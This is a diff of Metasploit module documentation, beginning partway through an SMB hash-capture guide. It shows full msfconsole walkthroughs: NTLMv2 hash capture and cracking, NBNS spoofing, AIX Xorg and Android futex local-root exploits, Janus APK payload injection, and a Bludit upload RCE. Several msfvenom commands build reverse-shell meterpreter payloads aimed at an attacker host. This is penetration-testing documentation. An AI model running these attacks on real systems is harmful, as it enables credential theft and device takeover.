+NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
+USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
+LMHASH:Disabled 
+LM_CLIENT_CHALLENGE:Disabled
+NTHASH:957c33ac7e9d7bf4459ddb2c65109aaa 
+NT_CLIENT_CHALLENGE:01010000000000007a7e22719474d5014eb86a13abf5f61000000000020000000000000000000000
+[*] SMB Captured - 2019-09-26 14:01:37 -0400
+NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
+USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
+LMHASH:Disabled 
+LM_CLIENT_CHALLENGE:Disabled
+NTHASH:e4411aead169063032e832539864b4ff 
+NT_CLIENT_CHALLENGE:0101000000000000fd0e3f719474d501ed3acc4801283dee00000000020000000000000000000000
+[*] SMB Captured - 2019-09-26 14:01:37 -0400
+NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
+USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
+LMHASH:Disabled 
+LM_CLIENT_CHALLENGE:Disabled
+NTHASH:f09d780a73410902dae21653cc9ef117 
+NT_CLIENT_CHALLENGE:0101000000000000bed143719474d5015e71b1d1c6aba91800000000020000000000000000000000
+[*] SMB Captured - 2019-09-26 14:01:37 -0400
+NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
+USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
+LMHASH:Disabled 
+LM_CLIENT_CHALLENGE:Disabled
+NTHASH:b9f84605b6cd0feb57c38f5d7251d5e0 
+NT_CLIENT_CHALLENGE:01010000000000007f9448719474d50164270f62c422d35200000000020000000000000000000000
+[*] SMB Captured - 2019-09-26 14:01:37 -0400
+NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
+USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
+LMHASH:Disabled 
+LM_CLIENT_CHALLENGE:Disabled
+NTHASH:a1f2d3c84c444368bea5cac47707faec 
+NT_CLIENT_CHALLENGE:01010000000000003f574d719474d50197b541b568bd9d3600000000020000000000000000000000
+[*] SMB Captured - 2019-09-26 14:01:37 -0400
+NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
+USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
+LMHASH:Disabled 
+LM_CLIENT_CHALLENGE:Disabled
+NTHASH:b895915d8c813c99512904bd1b84f2e2 
+NT_CLIENT_CHALLENGE:0101000000000000001a52719474d501b8fa9400bb1ff22f00000000020000000000000000000000
+[*] SMB Captured - 2019-09-26 14:01:37 -0400
+NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
+USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
+LMHASH:Disabled 
+LM_CLIENT_CHALLENGE:Disabled
+NTHASH:309c3abcd382e8541a811a8d9af66002 
+NT_CLIENT_CHALLENGE:0101000000000000c0dc56719474d501cea04f59f7a5dc5a00000000020000000000000000000000
+[*] SMB Captured - 2019-09-26 14:01:37 -0400
+NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
+USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
+LMHASH:Disabled 
+LM_CLIENT_CHALLENGE:Disabled
+NTHASH:1378542b978996b23f6f88c8d52b3d22 
+NT_CLIENT_CHALLENGE:0101000000000000819f5b719474d501cd5954986a11cd6600000000020000000000000000000000
+[*] SMB Captured - 2019-09-26 14:01:37 -0400
+NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
+USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
+LMHASH:Disabled 
+LM_CLIENT_CHALLENGE:Disabled
+NTHASH:425740c14d740ba89aae0533e1c320bb 
+NT_CLIENT_CHALLENGE:0101000000000000416260719474d501dc6bac2b5637209b00000000020000000000000000000000
+[*] SMB Captured - 2019-09-26 14:01:37 -0400
+NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
+USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
+LMHASH:Disabled 
+LM_CLIENT_CHALLENGE:Disabled
+NTHASH:b291ca93971c18c3fa3f9789c25296c8 
+NT_CLIENT_CHALLENGE:0101000000000000022565719474d501d583f2f3dbf2ea0000000000020000000000000000000000
+[*] SMB Captured - 2019-09-26 14:01:37 -0400
+NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
+USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
+LMHASH:Disabled 
+LM_CLIENT_CHALLENGE:Disabled
+NTHASH:3a908e59fe9f96a7f871b3aa2155dce1 
+NT_CLIENT_CHALLENGE:0101000000000000c2e769719474d5015e8a4d8a139e8eea00000000020000000000000000000000
+[*] SMB Captured - 2019-09-26 14:01:37 -0400
+NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
+USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
+LMHASH:Disabled 
+LM_CLIENT_CHALLENGE:Disabled
+NTHASH:2a76fc76174c297712b08e301ac1b08e 
+NT_CLIENT_CHALLENGE:010100000000000083aa6e719474d5019684d5d78475e27500000000020000000000000000000000
+[*] SMB Captured - 2019-09-26 14:01:37 -0400
+NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
+USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
+LMHASH:Disabled 
+LM_CLIENT_CHALLENGE:Disabled
+NTHASH:5d7057563a44671ec26ec021613f45b4 
+NT_CLIENT_CHALLENGE:0101000000000000a4ce75719474d50184900d6f208cb07500000000020000000000000000000000
+[*] SMB Captured - 2019-09-26 14:01:37 -0400
+NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
+USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
+LMHASH:Disabled 
+LM_CLIENT_CHALLENGE:Disabled
+NTHASH:ec6ce9d5171e9f5ee017d963797e760c 
+NT_CLIENT_CHALLENGE:010100000000000064917a719474d501006e93848f1fb88100000000020000000000000000000000
+[*] SMB Captured - 2019-09-26 14:01:37 -0400
+NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
+USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
+LMHASH:Disabled 
+LM_CLIENT_CHALLENGE:Disabled
+NTHASH:d96937debde3ce251f6889fc1be21a2f 
+NT_CLIENT_CHALLENGE:010100000000000025547f719474d5014dd729fda10cf20c00000000020000000000000000000000
+```
+
+Client:
+```
+Browse to the webpage.  This example is on Windows Server 2008r2 with Internet Explorer.
+```
+
+Crack the password:
+```
+# john /tmp/john_netntlmv2 -wordlist=/usr/share/wordlists/rockyou.txt
+Using default input encoding: UTF-8
+Loaded 17 password hashes with 17 different salts (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
+Remaining 15 password hashes with 15 different salts
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+Password123      (Administrator)
+Password123      (Administrator)
+Password123      (Administrator)
+Password123      (Administrator)
+Password123      (Administrator)
+Password123      (Administrator)
+Password123      (Administrator)
+Password123      (Administrator)
+Password123      (Administrator)
+Password123      (Administrator)
+Password123      (Administrator)
+Password123      (Administrator)
+Password123      (Administrator)
+Password123      (Administrator)
+Password123      (Administrator)
+15g 0:00:00:00 DONE (2019-09-26 14:06) 115.3g/s 283569p/s 4253Kc/s 4253KC/s dyesebel..holaz
+Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
+Session completed
+```
+
+### Spoofing NBNS
+
+If the target(s) are on the local network, it's possible to conduct an `nbns` spoof to attract
+additional SMB queries to your host.  This scenario will utilize `auxiliary/spoof/nbns/nbns_response`
+to conduct the spoofing.  If a Windows user attempts to browse or mount a network name such as
+`\\fake`, the `nbns` module will respond back with the set IP.
+
+This is based on [hackingarticles.in](https://www.hackingarticles.in/4-ways-capture-ntlm-hashes-network/)
+
+Server side:
+```
+msf5 > use auxiliary/server/capture/smb
+msf5 auxiliary(server/capture/smb) > set johnpwfile /tmp/johnnbns
+johnpwfile => /tmp/johnnbns
+msf5 auxiliary(server/capture/smb) > run
+[*] Auxiliary module running as background job 0.
+msf5 auxiliary(server/capture/smb) > 
+[*] Started service listener on 0.0.0.0:445 
+[*] Server started.
+
+msf5 auxiliary(server/capture/smb) > use auxiliary/spoof/nbns/nbns_response
+msf5 auxiliary(spoof/nbns/nbns_response) > set spoofip 1.1.1.1
+spoofip => 1.1.1.1
+msf5 auxiliary(spoof/nbns/nbns_response) > set interface eth0
+interface => eth0
+msf5 auxiliary(spoof/nbns/nbns_response) > exploit
+[*] Auxiliary module running as background job 1.
+msf5 auxiliary(spoof/nbns/nbns_response) > 
+[*] NBNS Spoofer started. Listening for NBNS requests with REGEX ".*" ...
+[+] 2.2.2.2    nbns - FAKE matches regex, responding with 1.1.1.1
+[+] 2.2.2.2    nbns - FAKE matches regex, responding with 1.1.1.1
+[*] SMB Captured - 2019-09-26 16:19:09 -0400
+NTLMv2 Response Captured from 2.2.2.2:49161 - 2.2.2.2
+USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
+LMHASH:Disabled 
+LM_CLIENT_CHALLENGE:Disabled
+NTHASH:5a44b22db99861330e1637f0565f595f 
+NT_CLIENT_CHALLENGE:010100000000000022529fa7a774d501b3b3f093392560d600000000020000000000000000000000
+[*] SMB Captured - 2019-09-26 16:19:09 -0400
+NTLMv2 Response Captured from 2.2.2.2:49161 - 2.2.2.2
+USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
+LMHASH:Disabled 
+LM_CLIENT_CHALLENGE:Disabled
+NTHASH:00837cb572f0116c7544ca0f56d31f5c 
+NT_CLIENT_CHALLENGE:0101000000000000c606c3a7a774d501c28ee74be786099100000000020000000000000000000000
+[*] SMB Captured - 2019-09-26 16:19:09 -0400
+NTLMv2 Response Captured from 2.2.2.2:49161 - 2.2.2.2
+USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
+LMHASH:Disabled 
+LM_CLIENT_CHALLENGE:Disabled
+NTHASH:b571090dea4270b6b6d2b3de39321b29 
+NT_CLIENT_CHALLENGE:010100000000000087c9c7a7a774d501c00e467bda8a8b4a00000000020000000000000000000000
+[*] SMB Captured - 2019-09-26 16:19:09 -0400
+NTLMv2 Response Captured from 2.2.2.2:49161 - 2.2.2.2
+USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
+LMHASH:Disabled 
+LM_CLIENT_CHALLENGE:Disabled
+NTHASH:dc28e9e94c6199e814937d61e3956c7d 
+NT_CLIENT_CHALLENGE:0101000000000000084fd1a7a774d5014f34895403460b1b00000000020000000000000000000000
+```
+
+Victim:
+```
+Open Explorer and type \\fake
+```
+
+Finally, Crack the password:
+```
+# john /tmp/johnnbns_netntlmv2 -wordlist=/usr/share/wordlists/rockyou.txt
+Using default input encoding: UTF-8
+Loaded 6 password hashes with 6 different salts (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+Password123      (Administrator)
+Password123      (Administrator)
+Password123      (Administrator)
+Password123      (Administrator)
+Password123      (Administrator)
+Password123      (Administrator)
+6g 0:00:00:00 DONE (2019-09-26 16:25) 100.0g/s 614400p/s 3686Kc/s 3686KC/s dyesebel..holaz
+Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
+Session completed
+```
+
+### Word Document UNC Injector
+
+Another strategy is to create content which can entice a user to open, containing a UNC link, and
+thus creating an SMB connection.  To accomplish this, we use `auxiliary/docx/word_unc_injector`.
+

documentation/modules/exploit/aix/local/xorg_x11_server.md

@@ -0,0 +1,74 @@
+## Description
+
+This module is a port of the OpenBSD X11 Xorg exploit to run on AIX. A permission check flaw exists for -modulepath and -logfile options when starting Xorg. This allows unprivileged users that can start the server the ability to elevate privileges and run arbitrary code under root privileges. This module has been tested with AIX 7.1 and 7.2, and should also work with 6.1. Due to permission restrictions of the crontab in AIX, this module does not use cron, and instead overwrites /etc/passwd in order to create a new user with root privileges. All currently logged in users need to be included when /etc/passwd is overwritten, else AIX will throw 'Cannot get "LOGNAME" variable' when attempting to change user. The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX, and is replaced by '-config', in conjuction with ANSI-C quotes to inject newlines when overwriting /etc/passwd.
+
+## Vulnerable Application
+
+This module has been tested successfully on:
+
+* AIX 7.1 with Xorg 7.2.3.0
+* AIX 7.2 with Xorg 7.2.3.0
+
+This table lists all vulnerable Xorg versions:
+
+| Lower Level | Upper Level |
+|-------------|-------------|
+| 6.1.9.0     | 6.1.9.100   |
+| 7.1.4.0     | 7.1.4.30    |
+| 7.1.5.0     | 7.1.5.31    |
+| 7.2.0.0     | 7.2.0.1     |
+| 7.2.1.0     | 7.2.1.0     |
+| 7.2.2.0     | 7.2.2.0     |
+| 7.2.3.0     | 7.2.3.15    |
+
+## Verification Steps
+
+1. `msfconsole`
+2. Get a session
+3. `use exploit/aix/local/xorg_x11_server`
+4. `set session <session>`
+5. `set LHOST <lhost>`
+6. `set LPORT <lport>`
+7. `set writabledir <writabledir>`
+8. `run`
+
+## Options
+
+**SESSION**
+
+Which session to use, which can be viewed with `sessions`
+
+**WritableDir**
+
+A writable directory file system path. (default: `/tmp`)
+
+## Scenarios
+https://vimeo.com/372193921
+
+```
+msf5 exploit(aix/local/xorg_x11_server) > set session 1
+session => 1
+msf5 exploit(aix/local/xorg_x11_server) > set writabledir /tmp
+writabledir => /tmp
+msf5 exploit(aix/local/xorg_x11_server) > run
+
+[*] Started reverse TCP handler on 0.0.0.0:8888
+[*] Xorg version is 7.2.3.0
+[*] Retrieving currently logged in users
+[*] Writing to /tmp/wow.ksh
+[*] Backing up /etc/passwd to /tmp/passwd.backup
+[*] Executing /tmp/wow.ksh
+[*] Checking if we are root
+[+] Got root!
+[*] Writing to /tmp/wowee.ksh
+[*] Executing shell payload
+[*] Restoring original /etc/passwd
+[*] Command shell session 2 opened (172.17.0.2:8888 -> 172.17.0.1:32948) at 2019-02-11 15:42:56 +0000
+[+] Deleted /tmp/wow.ksh
+[+] Deleted /tmp/passwd.backup
+[+] Deleted /tmp/wowee.ksh
+
+id
+uid=0(root) gid=0(system)
+
+```

documentation/modules/exploit/android/local/futex_requeue.md

@@ -0,0 +1,100 @@
+## Vulnerable Application
+
+This module exploits a Linux Kernel vulnerability, which is also available in the Android kernel, in a Linux subsystem call of `futex`.
+It does not trip (set off) Samsung NOX as of the time of writing.
+
+Failed exploitation attempts may reboot the device.
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Get a shell on a vulnerable android device
+  3. Do: ```use exploit/android/local/futex_requeue```
+  4. Select an appropriate target
+  5. Do: ```set lhost [IP]```
+  6. Do: ```run```
+  7. You should get a root shell.
+
+## Targets
+
+  **0   Automatic Targeting**
+
+  Attempt to automatically determine the target
+
+  **1   Default**
+
+  Nexus 4, 5, 7, etc
+
+  **2   New Samsung**
+
+  Samsung S3, S4, S5, etc
+
+  **3   Old Samsung**
+
+  Samsung Note 2, etc
+
+  **4   Samsung Grand**
+
+  Samsung Grand, etc
+
+## Scenarios
+
+### Samsung Galaxy S3 Verizon (SCH-I535 w/ android 4.4.2, kernel 3.4.0)
+
+  The following was used to generate a meterpreter Android application, and it was installed to the device.
+
+  ```
+  msfvenom -p android/meterpreter_reverse_tcp LHOST=111.111.1.111 LPORT=9999 -o /var/www/html/android.apk
+  ```
+
+  ```
+[*] Processing android.128.rb for ERB directives.
+resource (android.128.rb)> use exploit/multi/handler
+resource (android.128.rb)> set payload android/meterpreter_reverse_tcp
+payload => android/meterpreter_reverse_tcp
+resource (android.128.rb)> set lport 9999
+lport => 9999
+resource (android.128.rb)> set lhost 111.111.1.111
+lhost => 111.111.1.111
+resource (android.128.rb)> run
+[*] Started reverse TCP handler on 111.111.1.111:9999 
+[*] Meterpreter session 1 opened (111.111.1.111:9999 -> 222.222.2.222:56975) at 2019-10-22 20:56:34 -0400
+WARNING: Local file /root/metasploit-framework/data/meterpreter/ext_server_stdapi.jar is being used
+WARNING: Local files may be incompatible with the Metasploit Framework
+
+meterpreter > sysinfo
+Computer    : localhost
+OS          : Android 4.4.2 - Linux 3.4.0-1542239 (armv7l)
+Meterpreter : dalvik/android
+meterpreter > getuid
+Server username: u0_a191
+meterpreter > background
+[*] Backgrounding session 1...
+msf5 exploit(multi/handler) > use exploit/android/local/futex_requeue 
+msf5 exploit(android/local/futex_requeue) > set session 1
+session => 1
+msf5 exploit(android/local/futex_requeue) > set verbose true
+verbose => true
+msf5 exploit(android/local/futex_requeue) > set lhost 111.111.1.111
+lhost => 111.111.1.111
+msf5 exploit(android/local/futex_requeue) > check
+
+[+] Android version 4.4.2 appears to be vulnerable
+[*] The target appears to be vulnerable.
+msf5 exploit(android/local/futex_requeue) > run
+
+[*] Started reverse TCP handler on 111.111.1.111:4444 
+[+] Android version 4.4.2 appears to be vulnerable
+[*] Found device: d2vzw
+[*] Fingerprint: Verizon/d2vzw/d2vzw:4.4.2/KOT49H/I535VRUDNE1:user/release-keys
+[*] Using target: New Samsung
+[*] Loading exploit library /data/data/com.metasploit.stage/files/thelr
+[*] Loaded library /data/data/com.metasploit.stage/files/thelr, deleting
+[*] Waiting 300 seconds for payload
+[*] Transmitting intermediate stager...(136 bytes)
+[*] Sending stage (904600 bytes) to 222.222.2.222
+[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.222:37502) at 2019-10-22 20:57:45 -0400
+
+meterpreter > getuid
+Server username: uid=0, gid=0, euid=0, egid=0
+  ```

documentation/modules/exploit/android/local/janus.md

@@ -0,0 +1,248 @@
+## Description
+
+This module exploits CVE-2017-13156 in Android to install a payload into another
+application. The payload APK will have the same signature and can be installed
+as an update, preserving the existing data.
+The vulnerability was fixed in the 5th December 2017 security patch, and was
+additionally fixed by the APK Signature scheme v2, so only APKs signed with
+the v1 scheme are vulnerable.
+
+This module will potentially give two things, the first is access to the private
+date for the app which was injected in to.  The second is a more stealthy persistence
+mechanism since the payload will start each time the injected app starts.
+
+Some devices when installing the updated apk file give an error "There was a problem parsing the package."
+
+## Confirmed Vulnerable Apps
+
+The following table shows known vulnerable apps either pre-installed on a phone or available to download.
+
+| Package                                               | Version                  | From Phone                               | MD5 |
+|-------------------------------------------------------|--------------------------|------------------------------------------|-----|
+| com.google.android.googlequicksearchbox               |                          | Stock ZTE Z798BL Android 6.0.1 tracphone | 854378571509c9aa7a49f84d3f2c11c8 |
+| com.ume.browser.northamerica (Browser)                | v3.42.21161215           | Stock ZTE Z798BL Android 6.0.1 tracphone | 726a13647fb6afb9c147b540641eb82a |
+| [com.phonegap.camerasample](https://github.com/heavysixer/phonegap-camera-sample/blob/master/bin/CameraSample.apk) | 1.0 | | 00411ebec8e7ab3fc0292070cba5efbd |
+| com.android.vending (Google play store)               | 6.9.21.G-all [0] 3270725 | Stock ZTE Z798BL Android 6.0.1 tracphone | bed81c338f61c6095265592ee6fbb6d8 |
+| com.apptap.appfinder.tracfone                         | 1.7.5.0                  | Stock ZTE Z798BL Android 6.0.1 tracphone | c20da001a44cd30cc09c1460ca84f743 |
+| com.tracfone.generic.downloaderapp                    | R3.1.2                   | Stock ZTE Z798BL Android 6.0.1 tracphone | 448d39f6e5b2370d5b14f24c0d2dd79b |
+| com.google.android.tts (must enable TalkBack feature) | 3.10.10                  | Stock ZTE Z798BL Android 6.0.1 tracphone | c44485e17a9a5987e9e3d09507b2bfda |
+| com.google.android.videos                             | 3.19.11                  | Stock ZTE Z798BL Android 6.0.1 tracphone | e95baeda7fabc3173289be7274fa350f |
+
+## Hostile Apps
+
+This table shows apps which seemed to work (injected, installed without error) but had adverse effects.  These apps
+should typically be avoided unless tested.
+
+| Package                                 | Version               | From Phone                               | MD5 | Issue              |
+|-----------------------------------------|-----------------------|------------------------------------------|-----|--------------------|
+| com.google.android.youtube              | 11.38.54              | Stock ZTE Z798BL Android 6.0.1 tracphone | 8152ea89b99da5fe66880607a8f93d96 | App crash on start |
+| com.android.launcher3                   |                       | Stock ZTE Z798BL Android 6.0.1 tracphone | 45139b7bf9cc328dcd1f0a3f01f87eb6 | Seems to be the GUI for the phone.  When GUI restarted, no session. |
+| com.instagram.android                   | stub                  | Stock ZTE Z798BL Android 6.0.1 tracphone | 6e8543dec479508f4952ece014218597 | No session         |
+| com.google.android.music                | 6.14.3420-0.G.3279860 | Stock ZTE Z798BL Android 6.0.1 tracphone | 09a49fea442c88b23a8f3752caff33de | App crash on start |
+| com.google.android.apps.docs            |                       | Stock ZTE Z798BL Android 6.0.1 tracphone | b0e96f36b7bdfa7ca3064c71538c1339 | App loop, no start |
+| com.google.android.apps.maps            | 9.38.1                | Stock ZTE Z798BL Android 6.0.1 tracphone | 91d0f8f24ce451deb31cf9f4b9a1d3c6 | App crash on start |
+| com.android.chrome                      | 53.0.2785.124         | Stock ZTE Z798BL Android 6.0.1 tracphone | ac6bbbd5ea559dbb63c42eb7e863286b | Original session dies on upload |
+| com.google.android.gms                  |                       | Stock ZTE Z798BL Android 6.0.1 tracphone | 504de5427ec47fa3e124c7b5e3413c50 | Original session dies on upload |
+
+
+## Vulnerable Application
+
+This module will only work on applications that are signed with only the v1 signature scheme. You can verify which signing scheme an APK is signed with using the `apksigner` tool in the Android SDK:
+
+```
+$ apksigner verify -verbose notvulnerable.apk
+Verifies
+Verified using v1 scheme (JAR signing): true
+Verified using v2 scheme (APK Signature Scheme v2): true
+Number of signers: 1
+
+$ apksigner verify -verbose vulnerableapplication.apk
+Verifies
+Verified using v1 scheme (JAR signing): true
+Verified using v2 scheme (APK Signature Scheme v2): false
+Number of signers: 1
+```
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a session
+  4. Start a handler with `exploit/multi/handlers`
+  5. Do: `use exploit/android/local/janus`
+  6. Do: `set session [session]`
+  7. Do: `check`
+  8. Do: `run`
+  9. On the phone, a new screen will ask about installing the updated app, say yes/ok, then open the app.
+  10. You should get a new session.
+
+## Options
+
+  **PACKAGE**
+
+  Select a package to infect.  A list of packages can be obtained by running `app_list` on meterpreter.  Using `ALL` will
+  loop through all packages and attempt to exploit them until successful.  This can take a while, and cause lots of data to be
+  transferred.  Default is `com.phonegap.camerasample`
+
+## Scenarios
+
+### com.phonegap.camerasample on Nexus 6p with November 2016 Security Patch
+
+Install [com.phonegap.camerasample](https://github.com/heavysixer/phonegap-camera-sample/blob/master/bin/CameraSample.apk)
+
+An `exploit/multi/handler` was started prior to exploitation.
+
+```
+msf5 exploit(multi/handler) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                        Information         Connection
+  --  ----  ----                        -----------         ----------
+  1         meterpreter dalvik/android  u0_a80 @ localhost  192.168.0.176:4444 -> 192.168.0.107:46059 (192.168.0.107)
+
+msf5 exploit(multi/handler) > use exploit/android/local/janus
+msf5 exploit(android/local/janus) > set PACKAGE com.phonegap.camerasample
+PACKAGE => com.phonegap.camerasample
+msf5 exploit(android/local/janus) > set SESSION 1
+SESSION => 1
+msf5 exploit(android/local/janus) > set LHOST 192.168.0.176
+LHOST => 192.168.0.176
+msf5 exploit(android/local/janus) > set LPORT 4445
+LPORT => 4445
+msf5 exploit(android/local/janus) > run
+
+[*] Downloading APK: /data/app/com.phonegap.camerasample-1/base.apk
+[*] Decompiling original APK..
+[*] Decompiling payload APK..
+[*] Locating hook point..
+[*] Adding payload as package com.phonegap.camerasample.syerq
+[*] Loading /tmp/d20190824-7164-qydvgj/original/smali/com/phonegap/camerasample/CameraSampleActivity.smali and injecting payload..
+[*] Rebuilding apk with meterpreter injection as /tmp/d20190824-7164-qydvgj/output.apk
+[*] Uploading APK: /sdcard/app.apk
+[*] APK uploaded
+msf5 exploit(android/local/janus) >
+```
+Please note that the user will need to manually accept the install prompt on the device (and also open the application) before a new session is opened.
+
+```
+[*] Sending stage (72609 bytes) to 192.168.0.107
+[*] Meterpreter session 2 opened (192.168.0.176:4445 -> 192.168.0.107:49710) at 2018-10-01 17:44:50 +0800
+
+msf5 exploit(android/local/janus) > sessions 2
+[*] Starting interaction with 2...
+
+meterpreter > pwd
+/data/user/0/com.phonegap.camerasample/files
+
+```
+
+### Browser (com.ume.browser.northamerica) on ZTE Z798BL Android 6.0.1 with December 2016 Security Patch
+
+Original payload was generated as such:
+
+```
+./msfvenom -p android/meterpreter_reverse_tcp LHOST=1.1.1.1 LPORT=9999 -o /var/www/html/android.apk
+```
+
+```
+resource (janus.rb)> use exploit/multi/handler
+resource (janus.rb)> set payload android/meterpreter_reverse_tcp
+payload => android/meterpreter_reverse_tcp
+resource (janus.rb)> set lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (janus.rb)> set lport 9999
+lport => 9999
+resource (janus.rb)> run
+[*] Started reverse TCP handler on 1.1.1.1:9999 
+[*] Meterpreter session 1 opened (1.1.1.1:9999 -> 2.2.2.2:43753) at 2019-11-05 20:08:53 -0500
+WARNING: Local file /root/metasploit-framework/data/meterpreter/ext_server_stdapi.jar is being used
+
+meterpreter > getuid
+Server username: u0_a89
+meterpreter > pwd
+/data/user/0/com.metasploit.stage/files
+meterpreter > sysinfo
+Computer    : localhost
+OS          : Android 6.0.1 - Linux 3.10.49-gc5a5f6b-00560-gb1fe534 (armv7l)
+Meterpreter : dalvik/android
+meterpreter > background
+[*] Backgrounding session 1...
+```
+
+Start the payload handler to catch the new callback
+
+```
+resource (janus.rb)> set payload android/meterpreter/reverse_tcp
+payload => android/meterpreter/reverse_tcp
+resource (janus.rb)> set lport 4444
+lport => 4444
+resource (janus.rb)> run -j
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+```
+
+Exploit
+
+```
+resource (janus.rb)> use janus
+
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+
+Matching Modules
+================
+
+   #  Name                         Disclosure Date  Rank    Check  Description
+   -  ----                         ---------------  ----    -----  -----------
+   0  exploit/android/local/janus  2017-07-31       manual  Yes    Android Janus APK Signature bypass
+
+
+[*] Using exploit/android/local/janus
+resource (janus.rb)> set session 1
+session => 1
+resource (janus.rb)> set package com.ume.browser.northamerica
+package => com.ume.browser.northamerica
+resource (janus.rb)> set lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (janus.rb)> set lport 4444
+lport => 4444
+resource (janus.rb)> set verbose true
+verbose => true
+resource (janus.rb)> run
+[+] Android version 6.0.1 appears to be vulnerable.
+[+] Android security patch level 2016-12-01 is vulnerable
+[*] Downloading APK: /system/priv-app/UmeBrowser/UmeBrowser.apk
+[*] Decompiling original APK..
+[*] Decompiling payload APK..
+[*] Locating hook point..
+[*] Adding payload as package com.ume.browser.northamerica.onhad
+[*] Loading /tmp/d20191105-15343-1heobn1/original/smali/com/ume/browser/UmeApplication.smali and injecting payload..
+[*] Rebuilding apk with meterpreter injection as /tmp/d20191105-15343-1heobn1/output.apk
+[*] Uploading APK: /sdcard/app.apk
+[*] APK uploaded
+[*] User should now have a prompt to install an updated version of the app
+msf5 exploit(android/local/janus) >
+```
+
+Install the app on the phone.  For this app, clicking Open was not required, the shell was immediate.
+
+![phone 1](https://user-images.githubusercontent.com/752491/68260086-d404a000-0009-11ea-96bc-aa3700570326.png)
+![phone 2](https://user-images.githubusercontent.com/752491/68260085-d404a000-0009-11ea-9a10-b4da9c322996.png)
+![phone 3](https://user-images.githubusercontent.com/752491/68260084-d404a000-0009-11ea-8256-92803b5d2ec8.png)
+
+```
+WARNING: Local file /root/metasploit-framework/data/android/metstage.jar is being used
+WARNING: Local file /root/metasploit-framework/data/android/meterpreter.jar is being used
+
+[*] Sending stage (73445 bytes) to 2.2.2.2
+[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:38676) at 2019-11-05 20:12:38 -0500
+
+[-] Unknown command: (installing.
+msf5 exploit(android/local/janus) > sessions -i 2
+[*] Starting interaction with 2...
+
+meterpreter > getuid
+Server username: u0_a34
+meterpreter > pwd
+/data/user/0/com.ume.browser.northamerica/files
+```

documentation/modules/exploit/linux/http/alienvault_exec.md

@@ -17,7 +17,7 @@ Major version of older releases can be found at following URL.
 
 You can download file named as AlienVault-USM_trial_5.2.5.zip which contains a OVA file.
 In order to complete installation phase, you have to apply [https://www.alienvault.com/try-it-free](https://www.alienvault.com/try-it-free) .
-Once alienvault sales team validate your information, you will be able to complete the installation with your e-mail adress.
+Once alienvault sales team validate your information, you will be able to complete the installation with your e-mail address.
 
 ## Verification Steps
 

documentation/modules/exploit/linux/http/bludit_upload_images_exec.md

@@ -0,0 +1,30 @@
+# Bludit Directory Traversal Image File Upload Vulnerability
+
+## Description
+
+This module exploits a vulnerability in Bludit: A simple, fast, "secure", flat-file CMS. A vulnerability was found by [christasa](https://github.com/christasa) in the image uploading feature. A remote user could abuse the `uuid` parameter in the upload feature in order to save a malicious payload anywhere onto the server, and then use a custom `.htaccess` file to bypass the file extension check, and finally get remote code execution.
+
+## Setup
+
+1. Set up a Ubuntu box with Apache, PHP, and MySQL.
+2. Download: https://www.bludit.com/releases/bludit-3-9-2.zip
+3. Follow the installation guide [here](https://docs.bludit.com/en/getting-started/installation-guide). Make sure your Apache server sets `AllowOverride All` in /etc/apache2/apache2.conf.
+
+## Scenarios
+
+```
+msf5 exploit(linux/http/bludit_upload_images_exec) > check
+[*] 172.16.135.162:80 - The service is running, but could not be validated.
+msf5 exploit(linux/http/bludit_upload_images_exec) > run
+
+[*] Started reverse TCP handler on 172.16.135.1:4444 
+[+] Logged in as: admin
+[*] Retrieving UUID...
+[*] Uploading qGkVsmahdK.png...
+[*] Uploading .htaccess...
+[*] Executing qGkVsmahdK.png...
+[*] Sending stage (38288 bytes) to 172.16.135.162
